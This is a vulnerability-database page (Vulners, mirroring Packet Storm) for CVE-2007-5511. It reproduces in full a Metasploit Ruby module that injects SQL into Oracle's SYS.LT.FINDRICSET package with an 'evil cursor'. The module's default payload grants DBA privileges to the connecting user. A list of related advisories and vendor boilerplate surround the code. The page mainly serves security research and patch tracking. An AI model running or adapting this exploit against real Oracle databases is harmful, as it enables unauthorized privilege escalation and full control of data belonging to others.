Vulners
Lucene search
Oracle DB SQL Injection Via SYS.LT.FINDRICSET Evil Cursor Method
🗓️ 31 Aug 2024 00:00:00Reported by Jay Turla, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 232 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2007-5511 | 29 May 201815:50 | – | circl |
 | Oracle Database Server SYS.LT.FINDRICSET Function SQL Injection (CVE-2007-5511) | 3 Nov 200900:00 | – | checkpoint_advisories |
| Oracle Database SYS.LT.FINDRICSET SQL Injection (CVE-2007-5511) | 13 Nov 200700:00 | – | checkpoint_advisories |
 | CVE-2007-5511 | 17 Oct 200723:00 | – | cve |
 | CVE-2007-5511 | 17 Oct 200723:00 | – | cvelist |
 | Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method | 28 Jul 200913:43 | – | metasploit |
 | CVE-2007-5511 | 17 Oct 200723:17 | – | nvd |
 | Oracle Database Multiple Vulnerabilities (October 2007 CPU) | 16 Nov 201100:00 | – | nessus |
 | Design/Logic Flaw | 17 Oct 200723:17 | – | prion |
| Sql injection | 17 Oct 200723:17 | – | prion |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::ORACLE
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method',
'Description' => %q{
This module will escalate an Oracle DB user to DBA by exploiting
a sql injection bug in the SYS.LT.FINDRICSET package via Evil
Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on
thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical
Patch update October 2007.
},
'Author' => ['CG'],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2007-5511'],
[ 'OSVDB', '40079'],
[ 'BID', '26098' ],
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html'],
],
'DisclosureDate' => '2007-10-17'))
register_options(
[
OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]),
])
end
def run
return if not check_dependencies
p = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
cursor = <<-EOF
DECLARE
#{p} NUMBER;
BEGIN
#{p} := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(#{p},'declare pragma autonomous_transaction; begin execute immediate ''#{datastore['SQL'].upcase}'';commit;end;',0);
SYS.LT.FINDRICSET('.''||dbms_sql.execute('||#{p}||')||'''')--','');
END;
EOF
begin
print_status("Sending Evil Cursor and SQLI...")
prepare_exec(cursor)
rescue => e
return
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 26.5
EPSS0.65615